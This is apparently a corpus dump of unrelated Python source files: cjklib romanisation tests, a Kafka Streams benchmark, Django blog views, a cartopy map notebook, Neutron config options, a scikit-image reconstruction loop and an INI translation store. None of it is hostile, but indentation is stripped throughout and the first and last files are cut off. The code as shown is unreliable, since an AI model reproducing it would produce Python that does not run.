PINYIN_FINAL_MAPPING = {'iu': 'iou', 'ui': 'uei', 'un': 'uen', 'u:': u'ü',
'u:e': u'üe', 'u:an': u'üan', 'u:n': u'ün', 'iur': 'iour',
'uir': 'ueir', 'unr': 'uenr', 'u:r': u'ür', 'u:er': u'üer',
'u:anr': u'üanr', 'u:nr': u'ünr'}
INITIAL_REGEX = re.compile('^(tz|ts|ch|sh|[bpmfdtnlsjrgkh])?')
INITIAL_MAPPING = {'b': 'b', 'p': 'p', 'f': 'f', 'd': 'd', 't': 't',
'g': 'g', 'k': 'k', 'h': 'h', 'j': 'j', 'q': 'ch', 'x': 'sh', 'zh': 'j',
'ch': 'ch', 'sh': 'sh', 'z': 'tz', 'c': 'ts', 's': 's', 'm': 'm',
'n': 'n', 'l': 'l', 'r': 'r'}
"""Mapping of Pinyin intials to GR ones."""
def setUp(self):
super(GROperatorReferenceTest, self).setUp()
self.converter = self.f.createReadingConverter('Pinyin',
'GR', sourceOptions={'erhua': 'oneSyllable'},
targetOptions={'grRhotacisedFinalApostrophe': "'"})
self.pinyinOperator = self.f.createReadingOperator('Pinyin',
erhua='oneSyllable')
self.grOperator = self.f.createReadingOperator('GR',
grRhotacisedFinalApostrophe="'")
# read in plain text mappings
self.grJunctionSpecialMapping = {}
for line in self.SPECIAL_MAPPING.split("\n"):
if line.strip() == "":
continue
matchObj = re.match(r"((?:\w|:)+)\s+((?:\w|')+|-)\s+" \
+ "((?:\w|')+|-)\s+((?:\w|')+|-)\s+((?:\w|')+|-)", line)
assert(matchObj is not None)
pinyinSyllable, gr1, gr2, gr3, gr4 = matchObj.groups()
self.grJunctionSpecialMapping[pinyinSyllable] = {1: gr1, 2: gr2,
3: gr3, 4: gr4}
self.grJunctionFinalMapping = {}
self.grJunctionFinalMNLRMapping = {}
for line in self.FINAL_MAPPING.split("\n"):
matchObj = re.match(r"((?:\w|\:)+)\s+((?:\w|')+|-)\s+" \
+ "((?:\w|')+|-)\s+((?:\w|')+|-)\s+((?:\w|')+|-)" \
+ "\s+((?:\w|')+|-)\s+((?:\w|')+|-)", line)
if not matchObj:
continue
pinyinFinal, gr1, gr2, gr3, gr4, gr1_m, gr2_m = matchObj.groups()
if pinyinFinal in self.PINYIN_FINAL_MAPPING:
pinyinFinal = self.PINYIN_FINAL_MAPPING[pinyinFinal]
self.grJunctionFinalMapping[pinyinFinal] = {1: gr1, 2: gr2, 3: gr3,
4: gr4}
self.grJunctionFinalMNLRMapping[pinyinFinal] = {1: gr1_m, 2: gr2_m}
def testGRJunctionTable(self):
"""Test if all GR syllables have a reference given."""
grEntities = set(self.grOperator.getFullReadingEntities())
# no neutral tone syllables
for entity in grEntities.copy():
if entity[0] in ['.', self.grOperator.optionalNeutralToneMarker]:
grEntities.remove(entity)
# remove syllables with entry '-' in GR Junction table
grEntities = grEntities - set([u'yeai', u'yay', u'weng'])
pinyinEntities = self.pinyinOperator.getPlainReadingEntities()
for pinyinPlainSyllable in pinyinEntities:
pinyinInitial, pinyinFinal \
= self.pinyinOperator.getOnsetRhyme(pinyinPlainSyllable)
if pinyinPlainSyllable in ['zhi', 'chi', 'shi', 'zi', 'ci',
'si', 'ri', 'ju', 'qu', 'xu', 'er'] \
or (pinyinPlainSyllable[0] in ['y', 'w']) \
and pinyinPlainSyllable in self.grJunctionSpecialMapping:
for tone in [1, 2, 3, 4]:
target = self.grJunctionSpecialMapping[pinyinPlainSyllable]\
[tone]
if target == '-':
continue
pinyinSyllable = self.pinyinOperator.getTonalEntity(
pinyinPlainSyllable, tone)
syllable = self.converter.convert(pinyinSyllable)
self.assertEquals(syllable, target,
"Wrong conversion to GR %s for Pinyin syllable %s: %s" \
% (repr(target), repr(pinyinSyllable),
repr(syllable)))
# mark as seen
grEntities.discard(target)
elif pinyinInitial in ['m', 'n', 'l', 'r'] \
and pinyinFinal[0] != u'ʅ' \
and pinyinFinal in self.grJunctionFinalMNLRMapping \
and pinyinFinal in self.grJunctionFinalMapping:
for tone in [1, 2]:
target = self.grJunctionFinalMNLRMapping[pinyinFinal][tone]
if target == '-':
continue
pinyinSyllable = self.pinyinOperator.getTonalEntity(
pinyinPlainSyllable, tone)
syllable = self.converter.convert(pinyinSyllable)
tonalFinal = self.INITIAL_REGEX.sub('', syllable)
self.assertEquals(tonalFinal, target,
"Wrong conversion to GR %s for Pinyin syllable %s: %s" \
% (repr(target), repr(pinyinSyllable),
repr(syllable)))
# mark as seen
fullTarget = pinyinInitial + target
grEntities.discard(fullTarget)
for tone in [3, 4]:
target = self.grJunctionFinalMapping[pinyinFinal][tone]
if target == '-':
continue
pinyinSyllable = self.pinyinOperator.getTonalEntity(
pinyinPlainSyllable, tone)
syllable = self.converter.convert(pinyinSyllable)
tonalFinal = self.INITIAL_REGEX.sub('', syllable)
self.assertEquals(tonalFinal, target,
"Wrong conversion to GR %s for Pinyin syllable %s: %s" \
% (repr(target), repr(pinyinSyllable),
repr(syllable)))
# mark as seen
if pinyinInitial:
initialTarget = self.INITIAL_MAPPING[pinyinInitial]
else:
initialTarget = ''
grEntities.discard(initialTarget + target)
#elif pinyinInitial not in ['z', 'c', 's', 'zh', 'ch', 'sh', ''] \
#and pinyinFinal not in ['m', 'ng', 'mr', 'ngr', u'ʅ', u'ʅr']:
elif pinyinFinal not in ['m', 'n', 'ng', 'mr', 'nr', 'ngr', u'ʅ',
u'ʅr', u'ɿr', u'ê', u'êr'] \
and pinyinFinal in self.grJunctionFinalMapping:
for tone in [1, 2, 3, 4]:
target = self.grJunctionFinalMapping[pinyinFinal][tone]
if target == '-':
continue
pinyinSyllable = self.pinyinOperator.getTonalEntity(
pinyinPlainSyllable, tone)
syllable = self.converter.convert(pinyinSyllable)
tonalFinal = self.INITIAL_REGEX.sub('', syllable)
self.assertEquals(tonalFinal, target,
"Wrong conversion to GR %s for Pinyin syllable %s: %s" \
% (repr(target), repr(pinyinSyllable),
repr(syllable)))
# mark as seen
if pinyinInitial:
initialTarget = self.INITIAL_MAPPING[pinyinInitial]
else:
initialTarget = ''
grEntities.discard(initialTarget + target)
self.assert_(len(grEntities) == 0,
'Not all GR entities have test cases: %s' % repr(grEntities))
class MandarinBrailleOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'MandarinBraille'
DIALECTS = crossDict(
[{}, {'toneMarkType': 'none'}, {'missingToneMark': 'fifth'}],
)
# TODO
#class MandarinBrailleReferenceTest(ReadingOperatorReferenceTest,
#unittest.TestCase):
#READING_NAME = 'MandarinBraille'
#DECOMPOSITION_REFERENCES = []
#COMPOSITION_REFERENCES = []
#READING_ENTITY_REFERENCES = []
class MandarinIPAOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'MandarinIPA'
DIALECTS = crossDict(
[{}, {'toneMarkType': 'numbers'}, {'toneMarkType': 'chaoDigits'},
{'toneMarkType': 'numbers', 'missingToneMark': 'ignore'},
{'toneMarkType': 'chaoDigits', 'missingToneMark': 'ignore'},
#{'toneMarkType': 'diacritics'}, # TODO NotImplementedError
#{'toneMarkType': 'diacritics', 'missingToneMark': 'ignore'},
{'toneMarkType': 'none'}],
)
@staticmethod
def testUpperCase(dialect):
return False
def cleanDecomposition(self, decomposition, reading, **options):
return [entity for entity in decomposition if entity != '.']
# TODO
#class MandarinIPAReferenceTest(ReadingOperatorReferenceTest,
#unittest.TestCase):
#READING_NAME = 'MandarinIPA'
#DECOMPOSITION_REFERENCES = []
#COMPOSITION_REFERENCES = []
#READING_ENTITY_REFERENCES = []
class ShanghaineseIPAOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'ShanghaineseIPA'
DIALECTS = crossDict(
[{}, #{'toneMarkType': 'numbers'},
{'toneMarkType': 'chaoDigits'},
{'toneMarkType': 'superscriptChaoDigits'},
#{'toneMarkType': 'numbers', 'missingToneMark': 'ignore'},
{'toneMarkType': 'chaoDigits', 'missingToneMark': 'ignore'},
{'toneMarkType': 'superscriptChaoDigits',
'missingToneMark': 'ignore'},
#{'toneMarkType': 'diacritics'}, # TODO NotImplementedError
#{'toneMarkType': 'diacritics', 'missingToneMark': 'ignore'},
{'toneMarkType': 'none'}],
)
@staticmethod
def testUpperCase(dialect):
return False
def cleanDecomposition(self, decomposition, reading, **options):
return [entity for entity in decomposition if entity != '.']
class ShanghaineseIPAReferenceTest(ReadingOperatorReferenceTest,
unittest.TestCase):
READING_NAME = 'ShanghaineseIPA'
DECOMPOSITION_REFERENCES = [
({'toneMarkType': 'superscriptChaoDigits'}, [
(u'ɦi⁵³ ɦɑ̃⁵³.ʦɤ lɛ⁵³ gəˀ¹²', [u'ɦi⁵³', ' ', u'ɦɑ̃⁵³', '.', u'ʦɤ',
' ', u'lɛ⁵³', ' ', u'gəˀ¹²']),
]),
]
COMPOSITION_REFERENCES = [
({'toneMarkType': 'superscriptChaoDigits'}, [
([u'ɦi⁵³', ' ', u'ɦɑ̃⁵³', u'ʦɤ', ' ', u'lɛ⁵³', ' ', u'gəˀ¹²'],
u'ɦi⁵³ ɦɑ̃⁵³.ʦɤ lɛ⁵³ gəˀ¹²'),
]),
]
READING_ENTITY_REFERENCES = [
({'toneMarkType': 'chaoDigits'}, [
(u"tʰi53", True),
(u"tʰi34", True),
(u"di23", True),
(u"tʰiɪˀ55", True),
(u"diɪˀ12", True),
(u"noŋ53", True),
(u"diɪˀ1", False),
(u"diɪˀ23", True),
(u"diɪˀ55", True), # YinRu
]),
({'toneMarkType': 'superscriptChaoDigits'}, [
(u"tʰi⁵³", True),
(u"tʰi³⁴", True),
(u"di²³", True),
(u"tʰiɪˀ⁵⁵", True),
(u"diɪˀ¹²", True),
(u"noŋ⁵³", True),
(u"diɪˀ¹", False),
]),
({'toneMarkType': 'ipaToneBar'}, [
(u"tʰi˥˧", True),
(u"tʰi˧˦", True),
(u"di˨˧", True),
(u"tʰiɪˀ˥˥", True),
(u"diɪˀ˩˨", True),
(u"noŋ˥˧", True),
(u"tʰi˥", False),
]),
({'toneMarkType': 'chaoDigits', 'constrainEntering': True}, [
(u"tʰi53", True),
(u"tʰi34", True),
(u"di23", True),
(u"tʰiɪˀ55", True),
(u"diɪˀ12", True),
(u"noŋ53", True),
(u"diɪˀ1", False),
(u"diɪˀ23", False), # YangQu
(u"diɪˀ55", True), # YinRu
(u"di55", False), # YinRu
]),
({'toneMarkType': 'chaoDigits', 'constrainToneCategories': True}, [
(u"tʰi53", True),
(u"tʰi34", True),
(u"di23", True),
(u"tʰiɪˀ55", True),
(u"diɪˀ12", True),
(u"noŋ53", False), # Voiced + YinPing
(u"diɪˀ1", False),
(u"diɪˀ23", True), # Voiced + YangQu
(u"diɪˀ55", False), # Voiced + YinRu
(u"di55", False), # Voiced + YinRu
]),
({'toneMarkType': 'chaoDigits', 'constrainEntering': True,
'constrainToneCategories': True}, [
(u"tʰi53", True),
(u"tʰi34", True),
(u"di23", True),
(u"tʰiɪˀ55", True),
(u"diɪˀ12", True),
(u"noŋ53", False), # Voiced + YinPing
(u"diɪˀ1", False),
(u"diɪˀ23", False), # Voiced + YangQu
(u"diɪˀ55", False), # Voiced + YinRu
(u"di55", False), # Voiced + YinRu
]),
]
GUESS_DIALECT_REFERENCES = [
(u"zã˥˧", {'toneMarkType': 'ipaToneBar'}),
(u"zã53", {'toneMarkType': 'chaoDigits'}),
(u"ɦɑ⁵³.ʦɤ", {'toneMarkType': 'superscriptChaoDigits'}),
]
| tomas-mazak/taipan | taipan/cjklib/test/readingoperator.py | Python | gpl-3.0 | 110,252 |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ducktape.tests.test import Test
from ducktape.mark.resource import cluster
from ducktape.mark import parametrize, matrix
from kafkatest.tests.kafka_test import KafkaTest
from kafkatest.services.performance.streams_performance import StreamsSimpleBenchmarkService
from kafkatest.services.zookeeper import ZookeeperService
from kafkatest.services.kafka import KafkaService
from kafkatest.version import DEV_BRANCH
class StreamsSimpleBenchmarkTest(Test):
"""
Simple benchmark of Kafka Streams.
"""
def __init__(self, test_context):
super(StreamsSimpleBenchmarkTest, self).__init__(test_context)
self.num_records = 10000000L
self.replication = 1
self.num_threads = 1
@cluster(num_nodes=9)
@matrix(test=["produce", "consume", "count", "processstream", "processstreamwithsink", "processstreamwithstatestore", "processstreamwithcachedstatestore", "kstreamktablejoin", "kstreamkstreamjoin", "ktablektablejoin", "yahoo"], scale=[1, 3])
def test_simple_benchmark(self, test, scale):
"""
Run simple Kafka Streams benchmark
"""
self.driver = [None] * (scale + 1)
node = [None] * (scale)
data = [None] * (scale)
#############
# SETUP PHASE
#############
self.zk = ZookeeperService(self.test_context, num_nodes=1)
self.zk.start()
self.kafka = KafkaService(self.test_context, num_nodes=scale, zk=self.zk, version=DEV_BRANCH, topics={
'simpleBenchmarkSourceTopic' : { 'partitions': scale, 'replication-factor': self.replication },
'countTopic' : { 'partitions': scale, 'replication-factor': self.replication },
'simpleBenchmarkSinkTopic' : { 'partitions': scale, 'replication-factor': self.replication },
'joinSourceTopic1KStreamKStream' : { 'partitions': scale, 'replication-factor': self.replication },
'joinSourceTopic2KStreamKStream' : { 'partitions': scale, 'replication-factor': self.replication },
'joinSourceTopic1KStreamKTable' : { 'partitions': scale, 'replication-factor': self.replication },
'joinSourceTopic2KStreamKTable' : { 'partitions': scale, 'replication-factor': self.replication },
'joinSourceTopic1KTableKTable' : { 'partitions': scale, 'replication-factor': self.replication },
'joinSourceTopic2KTableKTable' : { 'partitions': scale, 'replication-factor': self.replication },
'yahooCampaigns' : { 'partitions': 20, 'replication-factor': self.replication },
'yahooEvents' : { 'partitions': 20, 'replication-factor': self.replication }
})
self.kafka.log_level = "INFO"
self.kafka.start()
################
# LOAD PHASE
################
self.load_driver = StreamsSimpleBenchmarkService(self.test_context, self.kafka,
self.num_records * scale, "true", test,
self.num_threads)
self.load_driver.start()
self.load_driver.wait()
self.load_driver.stop()
################
# RUN PHASE
################
for num in range(0, scale):
self.driver[num] = StreamsSimpleBenchmarkService(self.test_context, self.kafka,
self.num_records/(scale), "false", test,
self.num_threads)
self.driver[num].start()
#######################
# STOP + COLLECT PHASE
#######################
for num in range(0, scale):
self.driver[num].wait()
self.driver[num].stop()
node[num] = self.driver[num].node
node[num].account.ssh("grep Performance %s" % self.driver[num].STDOUT_FILE, allow_fail=False)
data[num] = self.driver[num].collect_data(node[num], "" )
final = {}
for num in range(0, scale):
for key in data[num]:
final[key + str(num)] = data[num][key]
return final
| themarkypantz/kafka | tests/kafkatest/benchmarks/streams/streams_simple_benchmark_test.py | Python | apache-2.0 | 4,969 |
from django.core.context_processors import csrf
from django.shortcuts import render, render_to_response, get_object_or_404
from blog.models import makale, yorum, kategori
from django.core.paginator import Paginator, InvalidPage, EmptyPage
from django.core.urlresolvers import reverse
from django.http import HttpResponse, HttpResponseRedirect
from blog.forms import yorumForm
# Create your views here.
def makale_views(request):
makaleler = makale.objects.all().order_by('-tarih')
paginator = Paginator(makaleler, 3)
try:
page = int(request.GET.get("page", '1'))
except ValueError:
page = 1
try:
makaleler = paginator.page(page)
except (InvalidPage, EmptyPage):
        makaleler = paginator.page(paginator.num_pages)
return render_to_response("list.html", dict(makaleler=makaleler, user=request.user))
def makale_goster(request, slug):
makalem = get_object_or_404(makale, slug = slug)
return render_to_response("makale.html", dict(makalem=makalem, user=request.user))
def yorum_ekle(request):
if request.POST:
form = yorumForm(request.POST)
if form.is_valid():
            form.save()
# return HttpResponseRedirect('sitem.blog.views.makale_goster')
else:
form = yorumForm()
args = {}
args.update(csrf(request))
args['form'] = form
return render_to_response('makale.html', args)
def kategori_views(request):
kategoriler = kategori.objects.all().order_by('-tarih')
return render_to_response('panel.html', dict(kategoriler=kategoriler))
| gencelo/tlog | app/blog/views.py | Python | mit | 1,558 |
# -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <codecell>
# -*- coding: utf-8 -*-
"""
Map tile acquisition
--------------------
Demonstrates cartopy's ability to draw map tiles which are downloaded on
demand from the Stamen Terrain tile server. Internally these tiles are then combined
into a single image and displayed in the cartopy GeoAxes.
"""
import matplotlib.pyplot as plt
from matplotlib.transforms import offset_copy
import cartopy.crs as ccrs
import cartopy.io.img_tiles as cimgt
%matplotlib inline
def main():
# Create a Stamen Terrain instance.
terrain = cimgt.StamenTerrain()
# Create a GeoAxes in the tile's projection.
plt.figure(figsize=(10,10))
ax = plt.axes(projection=terrain.crs)
# Limit the extent of the map to a small longitude/latitude range.
ax.set_extent([-122.3, -122, 46.1, 46.3])
    # Add the Stamen terrain data at zoom level 12.
ax.add_image(terrain, 12)
# Add a marker for the Mount Saint Helens volcano.
plt.plot(-122.189611,46.205868, marker='o', color='yellow', markersize=12,
alpha=0.7, transform=ccrs.Geodetic())
# Use the cartopy interface to create a matplotlib transform object
# for the Geodetic coordinate system. We will use this along with
# matplotlib's offset_copy function to define a coordinate system which
# translates the text by 25 pixels to the left.
geodetic_transform = ccrs.Geodetic()._as_mpl_transform(ax)
text_transform = offset_copy(geodetic_transform, units='dots', x=-25)
# Add text 25 pixels to the left of the volcano.
plt.text(-122.189611,46.205868, u'Mount Saint Helens Volcano',
verticalalignment='center', horizontalalignment='right',
transform=text_transform,
bbox=dict(facecolor='wheat', alpha=0.5, boxstyle='round'))
gl=ax.gridlines(draw_labels=True)
gl.xlabels_top = False
gl.ylabels_right = False
plt.show()
if __name__ == '__main__':
main()
# <codecell>
# <codecell>
# <codecell>
| rsignell-usgs/notebook | Cartopy/Cartopy_terrain.py | Python | mit | 2,013 |
# Copyright 2011 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Routines for configuring Neutron
"""
import os
import sys
from keystoneclient import auth
from keystoneclient import session as ks_session
from oslo_config import cfg
from oslo_db import options as db_options
from oslo_log import log as logging
import oslo_messaging
from paste import deploy
from neutron.api.v2 import attributes
from neutron.common import utils
from neutron.i18n import _LI
from neutron import version
LOG = logging.getLogger(__name__)
core_opts = [
cfg.StrOpt('bind_host', default='0.0.0.0',
help=_("The host IP to bind to")),
cfg.IntOpt('bind_port', default=9696,
help=_("The port to bind to")),
cfg.StrOpt('api_paste_config', default="api-paste.ini",
help=_("The API paste config file to use")),
cfg.StrOpt('api_extensions_path', default="",
help=_("The path for API extensions")),
cfg.StrOpt('auth_strategy', default='keystone',
help=_("The type of authentication to use")),
cfg.StrOpt('core_plugin',
help=_("The core plugin Neutron will use")),
cfg.ListOpt('service_plugins', default=[],
help=_("The service plugins Neutron will use")),
cfg.StrOpt('base_mac', default="fa:16:3e:00:00:00",
help=_("The base MAC address Neutron will use for VIFs")),
cfg.IntOpt('mac_generation_retries', default=16,
help=_("How many times Neutron will retry MAC generation")),
cfg.BoolOpt('allow_bulk', default=True,
help=_("Allow the usage of the bulk API")),
cfg.BoolOpt('allow_pagination', default=False,
help=_("Allow the usage of the pagination")),
cfg.BoolOpt('allow_sorting', default=False,
help=_("Allow the usage of the sorting")),
cfg.StrOpt('pagination_max_limit', default="-1",
help=_("The maximum number of items returned in a single "
"response, value was 'infinite' or negative integer "
"means no limit")),
cfg.IntOpt('max_dns_nameservers', default=5,
help=_("Maximum number of DNS nameservers")),
cfg.IntOpt('max_subnet_host_routes', default=20,
help=_("Maximum number of host routes per subnet")),
cfg.IntOpt('max_fixed_ips_per_port', default=5,
help=_("Maximum number of fixed ips per port")),
cfg.StrOpt('default_ipv4_subnet_pool', default=None,
help=_("Default IPv4 subnet-pool to be used for automatic "
"subnet CIDR allocation")),
cfg.StrOpt('default_ipv6_subnet_pool', default=None,
help=_("Default IPv6 subnet-pool to be used for automatic "
"subnet CIDR allocation")),
cfg.IntOpt('dhcp_lease_duration', default=86400,
deprecated_name='dhcp_lease_time',
help=_("DHCP lease duration (in seconds). Use -1 to tell "
"dnsmasq to use infinite lease times.")),
cfg.BoolOpt('dhcp_agent_notification', default=True,
help=_("Allow sending resource operation"
" notification to DHCP agent")),
cfg.BoolOpt('allow_overlapping_ips', default=False,
help=_("Allow overlapping IP support in Neutron")),
cfg.StrOpt('host', default=utils.get_hostname(),
help=_("Hostname to be used by the neutron server, agents and "
"services running on this machine. All the agents and "
"services running on this machine must use the same "
"host value.")),
cfg.BoolOpt('force_gateway_on_subnet', default=True,
help=_("Ensure that configured gateway is on subnet. "
"For IPv6, validate only if gateway is not a link "
"local address. Deprecated, to be removed during the "
"K release, at which point the check will be "
"mandatory.")),
cfg.BoolOpt('notify_nova_on_port_status_changes', default=True,
help=_("Send notification to nova when port status changes")),
cfg.BoolOpt('notify_nova_on_port_data_changes', default=True,
help=_("Send notification to nova when port data (fixed_ips/"
"floatingip) changes so nova can update its cache.")),
cfg.StrOpt('nova_url',
default='http://127.0.0.1:8774/v2',
help=_('URL for connection to nova. '
'Deprecated in favour of an auth plugin in [nova].')),
cfg.StrOpt('nova_admin_username',
help=_('Username for connecting to nova in admin context. '
'Deprecated in favour of an auth plugin in [nova].')),
cfg.StrOpt('nova_admin_password',
help=_('Password for connection to nova in admin context. '
'Deprecated in favour of an auth plugin in [nova].'),
secret=True),
cfg.StrOpt('nova_admin_tenant_id',
help=_('The uuid of the admin nova tenant. '
'Deprecated in favour of an auth plugin in [nova].')),
cfg.StrOpt('nova_admin_tenant_name',
help=_('The name of the admin nova tenant. '
'Deprecated in favour of an auth plugin in [nova].')),
cfg.StrOpt('nova_admin_auth_url',
default='http://localhost:5000/v2.0',
help=_('Authorization URL for connecting to nova in admin '
'context. '
'Deprecated in favour of an auth plugin in [nova].')),
cfg.IntOpt('send_events_interval', default=2,
help=_('Number of seconds between sending events to nova if '
'there are any events to send.')),
cfg.BoolOpt('advertise_mtu', default=False,
help=_('If True, effort is made to advertise MTU settings '
'to VMs via network methods (DHCP and RA MTU options) '
'when the network\'s preferred MTU is known.')),
cfg.BoolOpt('vlan_transparent', default=False,
help=_('If True, then allow plugins that support it to '
'create VLAN transparent networks.')),
]
core_cli_opts = [
cfg.StrOpt('state_path',
default='/var/lib/neutron',
help=_("Where to store Neutron state files. "
"This directory must be writable by the agent.")),
]
# Register the configuration options
cfg.CONF.register_opts(core_opts)
cfg.CONF.register_cli_opts(core_cli_opts)
# Ensure that the control exchange is set correctly
oslo_messaging.set_transport_defaults(control_exchange='neutron')
_SQL_CONNECTION_DEFAULT = 'sqlite://'
# Update the default QueuePool parameters. These can be tweaked by the
# configuration variables - max_pool_size, max_overflow and pool_timeout
db_options.set_defaults(cfg.CONF,
connection=_SQL_CONNECTION_DEFAULT,
sqlite_db='', max_pool_size=10,
max_overflow=20, pool_timeout=10)
NOVA_CONF_SECTION = 'nova'
nova_deprecated_opts = {
'cafile': [cfg.DeprecatedOpt('nova_ca_certificates_file', 'DEFAULT')],
'insecure': [cfg.DeprecatedOpt('nova_api_insecure', 'DEFAULT')],
}
ks_session.Session.register_conf_options(cfg.CONF, NOVA_CONF_SECTION,
deprecated_opts=nova_deprecated_opts)
auth.register_conf_options(cfg.CONF, NOVA_CONF_SECTION)
nova_opts = [
cfg.StrOpt('region_name',
deprecated_name='nova_region_name',
deprecated_group='DEFAULT',
help=_('Name of nova region to use. Useful if keystone manages'
' more than one region.')),
]
cfg.CONF.register_opts(nova_opts, group=NOVA_CONF_SECTION)
logging.register_options(cfg.CONF)
def init(args, **kwargs):
cfg.CONF(args=args, project='neutron',
version='%%(prog)s %s' % version.version_info.release_string(),
**kwargs)
# FIXME(ihrachys): if import is put in global, circular import
# failure occurs
from neutron.common import rpc as n_rpc
n_rpc.init(cfg.CONF)
# Validate that the base_mac is of the correct format
msg = attributes._validate_regex(cfg.CONF.base_mac,
attributes.MAC_PATTERN)
if msg:
msg = _("Base MAC: %s") % msg
raise Exception(msg)
def setup_logging():
"""Sets up the logging options for a log with supplied name."""
product_name = "neutron"
logging.setup(cfg.CONF, product_name)
LOG.info(_LI("Logging enabled!"))
LOG.info(_LI("%(prog)s version %(version)s"),
{'prog': sys.argv[0],
'version': version.version_info.release_string()})
LOG.debug("command line: %s", " ".join(sys.argv))
def load_paste_app(app_name):
"""Builds and returns a WSGI app from a paste config file.
:param app_name: Name of the application to load
:raises ConfigFilesNotFoundError when config file cannot be located
:raises RuntimeError when application cannot be loaded from config file
"""
config_path = cfg.CONF.find_file(cfg.CONF.api_paste_config)
if not config_path:
raise cfg.ConfigFilesNotFoundError(
config_files=[cfg.CONF.api_paste_config])
config_path = os.path.abspath(config_path)
LOG.info(_LI("Config paste file: %s"), config_path)
try:
app = deploy.loadapp("config:%s" % config_path, name=app_name)
except (LookupError, ImportError):
msg = (_("Unable to load %(app_name)s from "
"configuration file %(config_path)s.") %
{'app_name': app_name,
'config_path': config_path})
LOG.exception(msg)
raise RuntimeError(msg)
return app
| yuewko/neutron | neutron/common/config.py | Python | apache-2.0 | 10,476 |
"""
`reconstruction_loop` originally part of CellProfiler,
code licensed under both GPL and BSD licenses.
Website: http://www.cellprofiler.org
Copyright (c) 2003-2009 Massachusetts Institute of Technology
Copyright (c) 2009-2011 Broad Institute
All rights reserved.
Original author: Lee Kamentsky
"""
# pythran export reconstruction_loop(uint32[], int32[], int32[], int32[],
# intp, intp)
def reconstruction_loop(ranks, prev, next, strides, current_idx, image_stride):
"""The inner loop for reconstruction.
This algorithm uses the rank-order of pixels. If low intensity pixels have
a low rank and high intensity pixels have a high rank, then this loop
performs reconstruction by dilation. If this ranking is reversed, the
result is reconstruction by erosion.
For each pixel in the seed image, check its neighbors. If its neighbor's
rank is below that of the current pixel, replace the neighbor's rank with
the rank of the current pixel. This dilation is limited by the mask, i.e.
the rank at each pixel cannot exceed the mask as that pixel.
Parameters
----------
ranks : array
The rank order of the flattened seed and mask images.
prev, next: arrays
Indices of previous and next pixels in rank sorted order.
strides : array
Strides to neighbors of the current pixel.
current_idx : int
Index of highest-ranked pixel used as starting point in loop.
image_stride : int
Stride between seed image and mask image in `aranks`.
"""
nstrides = strides.shape[0]
while current_idx != -1:
if current_idx < image_stride:
current_rank = ranks[current_idx]
if current_rank == 0:
break
for i in range(nstrides):
neighbor_idx = current_idx + strides[i]
neighbor_rank = ranks[neighbor_idx]
# Only propagate neighbors ranked below the current rank
if neighbor_rank < current_rank:
mask_rank = ranks[neighbor_idx + image_stride]
# Only propagate neighbors ranked below the mask rank
if neighbor_rank < mask_rank:
# Raise the neighbor to the mask rank if
# the mask ranked below the current rank
if mask_rank < current_rank:
current_link = neighbor_idx + image_stride
ranks[neighbor_idx] = mask_rank
else:
current_link = current_idx
ranks[neighbor_idx] = current_rank
# unlink the neighbor
nprev = prev[neighbor_idx]
nnext = next[neighbor_idx]
next[nprev] = nnext
if nnext != -1:
prev[nnext] = nprev
# link to the neighbor after the current link
nnext = next[current_link]
next[neighbor_idx] = nnext
prev[neighbor_idx] = current_link
if nnext >= 0:
prev[nnext] = neighbor_idx
next[current_link] = neighbor_idx
current_idx = next[current_idx]
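# A rough usage sketch for context (assumption: this loop backs the public
# grey-scale reconstruction API, e.g. skimage.morphology.reconstruction, which
# builds the `ranks`, `prev`, `next` and `strides` arrays before calling it):
#
#     from skimage.morphology import reconstruction
#     # for method='dilation', seed must be everywhere <= mask
#     result = reconstruction(seed, mask, method='dilation')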
| serge-sans-paille/pythran | pythran/tests/scikit-image/_greyreconstruct.py | Python | bsd-3-clause | 3,405 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2007,2009 Zuza Software Foundation
#
# This file is part of the Translate Toolkit.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
"""Class that manages .ini files for translation
.. note:: A simple summary of what is permissible follows.
# a comment
; a comment
[Section]
a = a string
b : a string
"""
import re
from io import BytesIO
from iniparse import INIConfig
from translate.storage import base
dialects = {}
def register_dialect(dialect):
"""Decorator that registers the dialect."""
dialects[dialect.name] = dialect
return dialect
class Dialect(object):
"""Base class for differentiating dialect options and functions"""
name = None
@register_dialect
class DialectDefault(Dialect):
name = 'default'
def unescape(self, text):
return text
def escape(self, text):
return text.encode('utf-8')
@register_dialect
class DialectInno(DialectDefault):
name = 'inno'
def unescape(self, text):
return text.replace("%n", "\n").replace("%t", "\t")
def escape(self, text):
return text.replace("\t", "%t").replace("\n", "%n").encode('utf-8')
class iniunit(base.TranslationUnit):
"""A INI file entry"""
def __init__(self, source=None, **kwargs):
self.location = ""
if source:
self.source = source
super(iniunit, self).__init__(source)
def addlocation(self, location):
self.location = location
def getlocations(self):
return [self.location]
class inifile(base.TranslationStore):
"""An INI file"""
UnitClass = iniunit
def __init__(self, inputfile=None, unitclass=iniunit, dialect="default"):
